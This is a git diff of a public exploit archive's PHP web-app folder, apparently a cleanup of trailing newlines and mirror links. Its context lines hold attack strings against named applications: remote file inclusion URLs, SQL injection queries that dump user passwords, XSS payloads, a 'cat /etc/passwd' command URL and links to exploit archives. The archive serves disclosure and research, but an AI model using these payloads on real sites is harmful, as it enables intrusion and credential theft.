http://localhost/webERP/includes/LanguageSetup.php?PathPrefix=http://localhost/phpinfo.txt? # - ### [ dun / 2012 ] ##################################################### - - - - - + ### [ dun / 2012 ] ##################################################### \ No newline at end of file diff --git a/exploits/php/webapps/2032.pl b/exploits/php/webapps/2032.pl index 04df4eb16..e2394968a 100755 --- a/exploits/php/webapps/2032.pl +++ b/exploits/php/webapps/2032.pl @@ -248,4 +248,4 @@ for ($k=0;$k<=$#ARR;$k++) #======================================================================================================== -# milw0rm.com [2006-07-18] +# milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/exploits/php/webapps/2035.php b/exploits/php/webapps/2035.php index 9a9dc970e..81b15a0c2 100644 --- a/exploits/php/webapps/2035.php +++ b/exploits/php/webapps/2035.php @@ -136,4 +136,4 @@ die($temp[1]);} echo "Exploit failed..."; ?> -# milw0rm.com [2006-07-18] +# milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/exploits/php/webapps/20416.txt b/exploits/php/webapps/20416.txt index 7e6aa22a1..d91956879 100644 --- a/exploits/php/webapps/20416.txt +++ b/exploits/php/webapps/20416.txt @@ -38,5 +38,4 @@ Greetz: T0r3x, m1l05, JuMp-Er, EsC, UNICORN, Xermes, s4r4d0 ----------------------------snip-------------------------------------- Thanks, -~StRoNiX - +~StRoNiX \ No newline at end of file diff --git a/exploits/php/webapps/2050.php b/exploits/php/webapps/2050.php index 491abdafd..64ddc9938 100644 --- a/exploits/php/webapps/2050.php +++ b/exploits/php/webapps/2050.php @@ -145,4 +145,4 @@ die; echo "exploit failed..."; ?> -# milw0rm.com [2006-07-21] +# milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/exploits/php/webapps/2068.php b/exploits/php/webapps/2068.php index 488881863..5dfb2691b 100644 --- a/exploits/php/webapps/2068.php +++ b/exploits/php/webapps/2068.php @@ -216,4 +216,4 @@ else {die("Exploit failed..");} ?> -# milw0rm.com [2006-07-24] +# milw0rm.com [2006-07-24] \ No newline at end of file diff --git a/exploits/php/webapps/2088.php b/exploits/php/webapps/2088.php index 452a58a96..9c448c149 100644 --- a/exploits/php/webapps/2088.php +++ b/exploits/php/webapps/2088.php @@ -257,4 +257,4 @@ echo "password (clear text) -> ".$my_password."\n"; echo "----------------------------------------------------------\n"; ?> -# milw0rm.com [2006-07-30] +# milw0rm.com [2006-07-30] \ No newline at end of file diff --git a/exploits/php/webapps/2095.txt b/exploits/php/webapps/2095.txt index ca5d27c6b..9745f328d 100644 --- a/exploits/php/webapps/2095.txt +++ b/exploits/php/webapps/2095.txt @@ -21,4 +21,4 @@ # ############################################################################## -# milw0rm.com [2006-07-31] +# milw0rm.com [2006-07-31] \ No newline at end of file diff --git a/exploits/php/webapps/2096.txt b/exploits/php/webapps/2096.txt index 7d0c359aa..47e86e1dd 100644 --- a/exploits/php/webapps/2096.txt +++ b/exploits/php/webapps/2096.txt @@ -52,4 +52,4 @@ EAR.php/&cmd=ls + +-------------------------[ E O F ]---------------------------------- -# milw0rm.com [2006-07-31] +# milw0rm.com [2006-07-31] \ No newline at end of file diff --git a/exploits/php/webapps/2098.txt b/exploits/php/webapps/2098.txt index 8b2ec594d..7ee4be6a4 100644 --- a/exploits/php/webapps/2098.txt +++ b/exploits/php/webapps/2098.txt @@ -44,4 +44,4 @@ + +-------------------------[ E O F ]---------------------------------- -# milw0rm.com [2006-08-01] +# milw0rm.com [2006-08-01] \ No newline at end of file diff --git a/exploits/php/webapps/20983.pl b/exploits/php/webapps/20983.pl index 7a570c7bd..25e1de43f 100755 --- a/exploits/php/webapps/20983.pl +++ b/exploits/php/webapps/20983.pl @@ -93,5 +93,4 @@ chomp(my $target=); _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/2100.txt b/exploits/php/webapps/2100.txt index be9282f46..193e91f5e 100644 --- a/exploits/php/webapps/2100.txt +++ b/exploits/php/webapps/2100.txt @@ -45,4 +45,4 @@ + +-------------------------[ E O F ]---------------------------------- -# milw0rm.com [2006-08-01] +# milw0rm.com [2006-08-01] \ No newline at end of file diff --git a/exploits/php/webapps/2102.txt b/exploits/php/webapps/2102.txt index d7e0994ca..21c556879 100644 --- a/exploits/php/webapps/2102.txt +++ b/exploits/php/webapps/2102.txt @@ -35,4 +35,4 @@ #Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer ================================================================= -# milw0rm.com [2006-08-01] +# milw0rm.com [2006-08-01] \ No newline at end of file diff --git a/exploits/php/webapps/2114.html b/exploits/php/webapps/2114.html index bb2e9bcda..aab7e782c 100644 --- a/exploits/php/webapps/2114.html +++ b/exploits/php/webapps/2114.html @@ -16,4 +16,4 @@ Existing User:
document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php"; -# milw0rm.com [2006-08-02] +# milw0rm.com [2006-08-02] \ No newline at end of file diff --git a/exploits/php/webapps/2116.txt b/exploits/php/webapps/2116.txt index b11061ff5..a0e3ae076 100644 --- a/exploits/php/webapps/2116.txt +++ b/exploits/php/webapps/2116.txt @@ -22,4 +22,4 @@ Not-leet-enough: "Powered By TSEP" POC: http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=http://remotefile/? -# milw0rm.com [2006-08-02] +# milw0rm.com [2006-08-02] \ No newline at end of file diff --git a/exploits/php/webapps/2117.php b/exploits/php/webapps/2117.php index d91462150..df06ae6cc 100644 --- a/exploits/php/webapps/2117.php +++ b/exploits/php/webapps/2117.php @@ -305,4 +305,4 @@ elseif ($action==4) else echo ("specify an action [1-4]..."); ?> -# milw0rm.com [2006-08-03] +# milw0rm.com [2006-08-03] \ No newline at end of file diff --git a/exploits/php/webapps/2118.php b/exploits/php/webapps/2118.php index 81e69768f..bce977a32 100644 --- a/exploits/php/webapps/2118.php +++ b/exploits/php/webapps/2118.php @@ -259,4 +259,4 @@ if (is_hash($temp2[0])) echo "exploit failed..."; ?> -# milw0rm.com [2006-08-07] +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/exploits/php/webapps/21220.txt b/exploits/php/webapps/21220.txt index 48f66b850..57a66cdfe 100644 --- a/exploits/php/webapps/21220.txt +++ b/exploits/php/webapps/21220.txt @@ -95,4 +95,4 @@ Sepahan TelCom Network And Security Group (septelcom) www.septelcom.net -E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net +E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net \ No newline at end of file diff --git a/exploits/php/webapps/2123.txt b/exploits/php/webapps/2123.txt index 624b32146..1525d08ea 100644 --- a/exploits/php/webapps/2123.txt +++ b/exploits/php/webapps/2123.txt @@ -18,4 +18,4 @@ Att. SirDarckCat elhacker.net -# milw0rm.com [2006-08-07] +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/exploits/php/webapps/21250.txt b/exploits/php/webapps/21250.txt index 87bb1bf23..442e4cfd4 100644 --- a/exploits/php/webapps/21250.txt +++ b/exploits/php/webapps/21250.txt @@ -26,4 +26,4 @@ change X with number of post [!x!] To: All friends Cyber_Devil Allah with you -members [No-exploit.Com] +members [No-exploit.Com] \ No newline at end of file diff --git a/exploits/php/webapps/2128.txt b/exploits/php/webapps/2128.txt index 0cd4a39ec..b8dd7e222 100644 --- a/exploits/php/webapps/2128.txt +++ b/exploits/php/webapps/2128.txt @@ -27,4 +27,4 @@ http://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root #Pozdro dla wszystkich ;-) -# milw0rm.com [2006-08-07] +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/exploits/php/webapps/21301.txt b/exploits/php/webapps/21301.txt index c174f1297..c1a69973e 100644 --- a/exploits/php/webapps/21301.txt +++ b/exploits/php/webapps/21301.txt @@ -8,4 +8,4 @@ OpenBB allows users to include images in forum messages using image tags, with t It is possible to inject arbitrary script code into forum messages via these image tags. Script code will be executed in the browser of the user viewing the forum message, in the context of the website running the vulnerable software. This may allow an attacker to steal cookie-based authentication credentials. -[img]javasCript:alert('Hello world.')[/img] +[img]javasCript:alert('Hello world.')[/img] \ No newline at end of file diff --git a/exploits/php/webapps/21715.txt b/exploits/php/webapps/21715.txt index 8b60e95ff..fef014146 100644 --- a/exploits/php/webapps/21715.txt +++ b/exploits/php/webapps/21715.txt @@ -48,5 +48,4 @@ Exploit: _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22004.txt b/exploits/php/webapps/22004.txt index cf26c4d5b..4f86aa80d 100644 --- a/exploits/php/webapps/22004.txt +++ b/exploits/php/webapps/22004.txt @@ -40,4 +40,4 @@ The Full path can be retrieved using Array method [] in ItemID & id Parameters . Example : - http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 + http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 \ No newline at end of file diff --git a/exploits/php/webapps/22089.txt b/exploits/php/webapps/22089.txt index 181b63d67..943240407 100644 --- a/exploits/php/webapps/22089.txt +++ b/exploits/php/webapps/22089.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in the PHP-Nuke Web Mail module. When a user By accessing a PHP script located in the web directory, arbitrary PHP commands will be executed on the target server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22089.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22089.zip \ No newline at end of file diff --git a/exploits/php/webapps/22090.txt b/exploits/php/webapps/22090.txt index a37a40abc..c3a4554d6 100644 --- a/exploits/php/webapps/22090.txt +++ b/exploits/php/webapps/22090.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/6400/info A vulnerability has been discovered in the PHP-Nuke web mail module. Due to insufficient sanitization of HTML emails it is possible for an attacker to embed script code into malicious messages. Opening an email containing attacker-supplied script code would result in the execution of arbitrary script code within the client's browser. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22090.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22090.zip \ No newline at end of file diff --git a/exploits/php/webapps/22097.txt b/exploits/php/webapps/22097.txt index 74a364f81..b23f05383 100644 --- a/exploits/php/webapps/22097.txt +++ b/exploits/php/webapps/22097.txt @@ -37,5 +37,4 @@ Exploit: _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22152.txt b/exploits/php/webapps/22152.txt index 8d1e80376..b63ad47ed 100644 --- a/exploits/php/webapps/22152.txt +++ b/exploits/php/webapps/22152.txt @@ -214,5 +214,4 @@ chomp(my $target=); _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22403.txt b/exploits/php/webapps/22403.txt index cfee13b9a..a1977b25e 100644 --- a/exploits/php/webapps/22403.txt +++ b/exploits/php/webapps/22403.txt @@ -61,5 +61,4 @@ Spider Catalog for Joomla! is a convenient tool for organizing the products repr _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22463.txt b/exploits/php/webapps/22463.txt index 06f27c7bc..65b87b963 100644 --- a/exploits/php/webapps/22463.txt +++ b/exploits/php/webapps/22463.txt @@ -92,5 +92,4 @@ be accompanied with an image. _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22473.txt b/exploits/php/webapps/22473.txt index 14319c51f..a23830499 100644 --- a/exploits/php/webapps/22473.txt +++ b/exploits/php/webapps/22473.txt @@ -10,4 +10,4 @@ http://www.example.com/albums/userpics/Copperminer.jpg.php?[command] Where command can be something like "id;uname%20-a" or "cat%20/etc/passwd" -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22473.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22473.tar.gz \ No newline at end of file diff --git a/exploits/php/webapps/22710.txt b/exploits/php/webapps/22710.txt index 998577c9f..33df73dd1 100644 --- a/exploits/php/webapps/22710.txt +++ b/exploits/php/webapps/22710.txt @@ -35,4 +35,4 @@ --end- +-end- \ No newline at end of file diff --git a/exploits/php/webapps/22712.txt b/exploits/php/webapps/22712.txt index 02e5f48ec..7465737a7 100644 --- a/exploits/php/webapps/22712.txt +++ b/exploits/php/webapps/22712.txt @@ -46,4 +46,4 @@ -end- --end- +-end- \ No newline at end of file diff --git a/exploits/php/webapps/23028.txt b/exploits/php/webapps/23028.txt index a38d8e100..11cb12206 100644 --- a/exploits/php/webapps/23028.txt +++ b/exploits/php/webapps/23028.txt @@ -13,4 +13,4 @@ ## http://www.example.com/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23 ########################################################################## # 0x31337.net -########################################################################## +########################################################################## \ No newline at end of file diff --git a/exploits/php/webapps/23029.txt b/exploits/php/webapps/23029.txt index 1e9d92044..5ee63d745 100644 --- a/exploits/php/webapps/23029.txt +++ b/exploits/php/webapps/23029.txt @@ -14,4 +14,4 @@ ## http://www.example.comindex.php?menuitem=26&domeinvraag=&aktie=Zoek&idx=23 ########################################################################## # 0x31337.net -########################################################################## +########################################################################## \ No newline at end of file diff --git a/exploits/php/webapps/23106.txt b/exploits/php/webapps/23106.txt index 758156e51..c4d815fff 100644 --- a/exploits/php/webapps/23106.txt +++ b/exploits/php/webapps/23106.txt @@ -11,6 +11,4 @@ About 225 results (0.21 seconds) The vulnerability lies in the eventform.php file. -Entering your JavaScript into the form boxes and saving the event will store and trigger your persistent XSS script. Simplez. Have fun. - - +Entering your JavaScript into the form boxes and saving the event will store and trigger your persistent XSS script. Simplez. Have fun. \ No newline at end of file diff --git a/exploits/php/webapps/23249.txt b/exploits/php/webapps/23249.txt index 667d4fd03..d52cc9443 100644 --- a/exploits/php/webapps/23249.txt +++ b/exploits/php/webapps/23249.txt @@ -26,4 +26,4 @@ http://server/kingchat.php?chat=2&l=2&message= Your persistant XSS will be stored here. -Enjoy ;). VipVince. +Enjoy ;). VipVince. \ No newline at end of file diff --git a/exploits/php/webapps/23286.txt b/exploits/php/webapps/23286.txt index 5f82f998e..29f53ffc6 100644 --- a/exploits/php/webapps/23286.txt +++ b/exploits/php/webapps/23286.txt @@ -78,5 +78,4 @@ categories, prices and special fees can be translated. _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/24480.txt b/exploits/php/webapps/24480.txt index 37e581a00..3c99d06a2 100644 --- a/exploits/php/webapps/24480.txt +++ b/exploits/php/webapps/24480.txt @@ -22,4 +22,4 @@ Cheers! # - A valid account as at least a user # - The target to have outgoing internet connectivity -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24480.tar.gz \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24480.tar.gz \ No newline at end of file diff --git a/exploits/php/webapps/24514.txt b/exploits/php/webapps/24514.txt index f10a50e60..22cff6609 100644 --- a/exploits/php/webapps/24514.txt +++ b/exploits/php/webapps/24514.txt @@ -36,4 +36,4 @@ # # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx # # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy) - ################################################################################# + ################################################################################# \ No newline at end of file diff --git a/exploits/php/webapps/24851.txt b/exploits/php/webapps/24851.txt index b07078d3a..bd8c0ecd7 100644 --- a/exploits/php/webapps/24851.txt +++ b/exploits/php/webapps/24851.txt @@ -14,4 +14,4 @@ Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tmpl=component&c http://server/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- ********************************* -# Turkey. +# Turkey. \ No newline at end of file diff --git a/exploits/php/webapps/24879.txt b/exploits/php/webapps/24879.txt index 038c90c53..fbd36962f 100644 --- a/exploits/php/webapps/24879.txt +++ b/exploits/php/webapps/24879.txt @@ -85,6 +85,4 @@ $insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass Only using stripslahes which will not protect against doing sql injection attack. -#independent Pakistani Security Researcher - - +#independent Pakistani Security Researcher \ No newline at end of file diff --git a/exploits/php/webapps/25168.c b/exploits/php/webapps/25168.c index c8e10b497..ac16ffb94 100644 --- a/exploits/php/webapps/25168.c +++ b/exploits/php/webapps/25168.c @@ -92,5 +92,4 @@ printf("Cookie modified: \n\n%s\n\n", contenido); printf("The cookies file has overwriten... looks like the exploit has worked"); } else printf("\n\nThe file cookies.txt has not write permissions."); return 0; -} - +} \ No newline at end of file diff --git a/exploits/php/webapps/25249.txt b/exploits/php/webapps/25249.txt index c1534c71d..1f8b62c7a 100644 --- a/exploits/php/webapps/25249.txt +++ b/exploits/php/webapps/25249.txt @@ -120,4 +120,4 @@ - Credits: - Ahmed Aboul-Ela - Information Security Consultant @ Starware Group + Ahmed Aboul-Ela - Information Security Consultant @ Starware Group \ No newline at end of file diff --git a/exploits/php/webapps/25410.txt b/exploits/php/webapps/25410.txt index 6bf0f1333..b34b6f79b 100644 --- a/exploits/php/webapps/25410.txt +++ b/exploits/php/webapps/25410.txt @@ -14,5 +14,4 @@ Sql Injection: server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql] server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- - -#################################################################### - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/25726.txt b/exploits/php/webapps/25726.txt index bae1653d6..ed048375a 100644 --- a/exploits/php/webapps/25726.txt +++ b/exploits/php/webapps/25726.txt @@ -25,4 +25,4 @@ $query = "SELECT * FROM `playlist` WHERE $playlist_id;"; http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12 -################################################ +################################################ \ No newline at end of file diff --git a/exploits/php/webapps/26111.txt b/exploits/php/webapps/26111.txt index 62433fd23..13ef238b9 100644 --- a/exploits/php/webapps/26111.txt +++ b/exploits/php/webapps/26111.txt @@ -4,4 +4,4 @@ Gravity Board X (GBX) is affected by an unauthorized access vulnerability. This An attacker can exploit this vulnerability and modify an existing CSS template to include arbitrary PHP code. The attacker can then call the stored template and have the malicious PHP code executed in the context of the Web server process. This may aid the attacker in further attacks against the underlying system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26111.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26111.zip \ No newline at end of file diff --git a/exploits/php/webapps/26213.txt b/exploits/php/webapps/26213.txt index 8edd2383e..386144e71 100644 --- a/exploits/php/webapps/26213.txt +++ b/exploits/php/webapps/26213.txt @@ -41,4 +41,4 @@ EXPLOIT POC ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 -################################################################################################################ +################################################################################################################ \ No newline at end of file diff --git a/exploits/php/webapps/26425.pl b/exploits/php/webapps/26425.pl index b092cc1f6..ac5ebc89a 100755 --- a/exploits/php/webapps/26425.pl +++ b/exploits/php/webapps/26425.pl @@ -66,4 +66,4 @@ print ("\n\n"); exit(); -# batznet-security.de && batznet.com +# batznet-security.de && batznet.com \ No newline at end of file diff --git a/exploits/php/webapps/27450.txt b/exploits/php/webapps/27450.txt index 86cbd07fa..55ab4502c 100644 --- a/exploits/php/webapps/27450.txt +++ b/exploits/php/webapps/27450.txt @@ -4,4 +4,4 @@ Reportedly, an attacker can carry out directory-traversal attacks. These issues A successful attack can allow the attacker to place potentially malicious files and overwrite files on a computer in the context of the user running the affected application. A successful exploit may aid in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27450.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27450.zip \ No newline at end of file diff --git a/exploits/php/webapps/28139.txt b/exploits/php/webapps/28139.txt index 436723d75..21ebb2dfc 100644 --- a/exploits/php/webapps/28139.txt +++ b/exploits/php/webapps/28139.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t GET http://www.example.com:80/gen_confirm_mem.php HTTP/1.0 Accept: */* Host: www.example.com -Cookie: PHPSESSID="> +Cookie: PHPSESSID="> \ No newline at end of file diff --git a/exploits/php/webapps/28586.txt b/exploits/php/webapps/28586.txt index 017bf991d..d9d156cbe 100644 --- a/exploits/php/webapps/28586.txt +++ b/exploits/php/webapps/28586.txt @@ -6,7 +6,4 @@ A successful exploit of these vulnerabilities could allow an attacker to comprom if magic_quotes_gpc = off login with user name : ' or id=1/* or ' or authorization = 4/* index.php?n=http://www.example.com/modules/register&a=3&d=3&key='%20or%20id=1/* -You will be able to change the password for any user .. know his id and put it in the url. -- or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators
Forgot your password?
Username:
put the user name value Change security@soqor.net to your email ' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/* - - - +You will be able to change the password for any user .. know his id and put it in the url. -- or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators
Forgot your password?
Username:
put the user name value Change security@soqor.net to your email ' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/* \ No newline at end of file diff --git a/exploits/php/webapps/28844.txt b/exploits/php/webapps/28844.txt index cbef68919..07283e426 100644 --- a/exploits/php/webapps/28844.txt +++ b/exploits/php/webapps/28844.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t cPanel version 10.9.0 is vulnerable; other versions may also be affected. -http://www.example.com:2082/scripts2/editzonetemplate?template=[XssCodes] +http://www.example.com:2082/scripts2/editzonetemplate?template=[XssCodes] \ No newline at end of file diff --git a/exploits/php/webapps/28896.txt b/exploits/php/webapps/28896.txt index 5383a253a..e54bb227d 100644 --- a/exploits/php/webapps/28896.txt +++ b/exploits/php/webapps/28896.txt @@ -4,4 +4,4 @@ RunCMS is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28896.php.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28896.php.zip \ No newline at end of file diff --git a/exploits/php/webapps/29451.txt b/exploits/php/webapps/29451.txt index 4942b05ba..b5f5afe50 100644 --- a/exploits/php/webapps/29451.txt +++ b/exploits/php/webapps/29451.txt @@ -8,7 +8,4 @@ All In One Control Panel 1.3.009 and prior versions are vulnerable. http://www.example.com/AIOCP/public/code/cp_downloads.php?did=[sql] -http://www.example.org/AIOCP/public/code/cp_downloads.php?did='+UNION+SELECT+NULL,NULL,NULL,NULL,user_id,NULL,NULL,user_name,NULL,user_password,NULL,NULL,NULL,NULL,NULL+FROM+aiocp_users+WHERE+user_name<>'Anonymous - - - +http://www.example.org/AIOCP/public/code/cp_downloads.php?did='+UNION+SELECT+NULL,NULL,NULL,NULL,user_id,NULL,NULL,user_name,NULL,user_password,NULL,NULL,NULL,NULL,NULL+FROM+aiocp_users+WHERE+user_name<>'Anonymous \ No newline at end of file diff --git a/exploits/php/webapps/29998.txt b/exploits/php/webapps/29998.txt index 6686e877c..9fc17ec41 100644 --- a/exploits/php/webapps/29998.txt +++ b/exploits/php/webapps/29998.txt @@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to execute code in the context of This issue affects Campsite 2.6.1. Earlier versions may also be affected. -http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt? +http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt? \ No newline at end of file diff --git a/exploits/php/webapps/30105.txt b/exploits/php/webapps/30105.txt index ce1989532..9405ec1bb 100644 --- a/exploits/php/webapps/30105.txt +++ b/exploits/php/webapps/30105.txt @@ -31,5 +31,4 @@ scripting. The payload used is More information, including screenshots, can be found at: -http://www.nerdbox.it/wordpress-download-manager-xss/ - +http://www.nerdbox.it/wordpress-download-manager-xss/ \ No newline at end of file diff --git a/exploits/php/webapps/30877.txt b/exploits/php/webapps/30877.txt index 3c3f7896a..bb60ea370 100644 --- a/exploits/php/webapps/30877.txt +++ b/exploits/php/webapps/30877.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary script code in the browser Roundcube Webmail 0.1rc2 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30877.eml \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30877.eml \ No newline at end of file diff --git a/exploits/php/webapps/30926.txt b/exploits/php/webapps/30926.txt index 5f8e7f773..dfd94d30e 100644 --- a/exploits/php/webapps/30926.txt +++ b/exploits/php/webapps/30926.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect Dokeos 1.8.4 and earlier versions. -http://www.example.com/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS +http://www.example.com/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS \ No newline at end of file diff --git a/exploits/php/webapps/30946.txt b/exploits/php/webapps/30946.txt index e610b3ef2..90d9e517d 100644 --- a/exploits/php/webapps/30946.txt +++ b/exploits/php/webapps/30946.txt @@ -73,5 +73,4 @@ Disclosure Timeline: Advisory discovered by: Yogesh Phadtare Secur-I Research Group - http://securview.com/ - + http://securview.com/ \ No newline at end of file diff --git a/exploits/php/webapps/31678.txt b/exploits/php/webapps/31678.txt index e99c40ff9..f0d73f3c8 100644 --- a/exploits/php/webapps/31678.txt +++ b/exploits/php/webapps/31678.txt @@ -4,4 +4,4 @@ SMF (Simple Machine Forum) is prone to a security-bypass vulnerability that occu Successfully exploiting this issue may allow attackers to send unsolicited spam or perform other automated attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31678.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31678.zip \ No newline at end of file diff --git a/exploits/php/webapps/32868.txt b/exploits/php/webapps/32868.txt index a526ed4a3..babc3becc 100644 --- a/exploits/php/webapps/32868.txt +++ b/exploits/php/webapps/32868.txt @@ -53,4 +53,4 @@ Discovered by dxw: ================ Tom Adams >>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464 -Please visit security.dxw.com for more information. +Please visit security.dxw.com for more information. \ No newline at end of file diff --git a/exploits/php/webapps/33030.txt b/exploits/php/webapps/33030.txt index 605117231..a01e0a2a7 100644 --- a/exploits/php/webapps/33030.txt +++ b/exploits/php/webapps/33030.txt @@ -30,4 +30,4 @@ file_exists("admin/" . $admin . ".php")) { . ".php"); } -----------[exploit Fin] +----------[exploit Fin] \ No newline at end of file diff --git a/exploits/php/webapps/33072.txt b/exploits/php/webapps/33072.txt index 2442501a4..2bdf2dadb 100644 --- a/exploits/php/webapps/33072.txt +++ b/exploits/php/webapps/33072.txt @@ -23,4 +23,4 @@ Code : } -----------[exploit Fin] +----------[exploit Fin] \ No newline at end of file diff --git a/exploits/php/webapps/33195.txt b/exploits/php/webapps/33195.txt index ce21ec0c5..8dc1677a8 100644 --- a/exploits/php/webapps/33195.txt +++ b/exploits/php/webapps/33195.txt @@ -32,4 +32,4 @@ https://www.youtube.com/watch?v=pJ1fGN3DIMU&feature=youtu.be -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33195-Team_Helpdesk_Web.zip \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33195-Team_Helpdesk_Web.zip \ No newline at end of file diff --git a/exploits/php/webapps/33487.txt b/exploits/php/webapps/33487.txt index d86ce7202..27e597303 100644 --- a/exploits/php/webapps/33487.txt +++ b/exploits/php/webapps/33487.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PhPepperShop 2.5 is vulnerable; other versions may also be affected. -http://www.example.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971 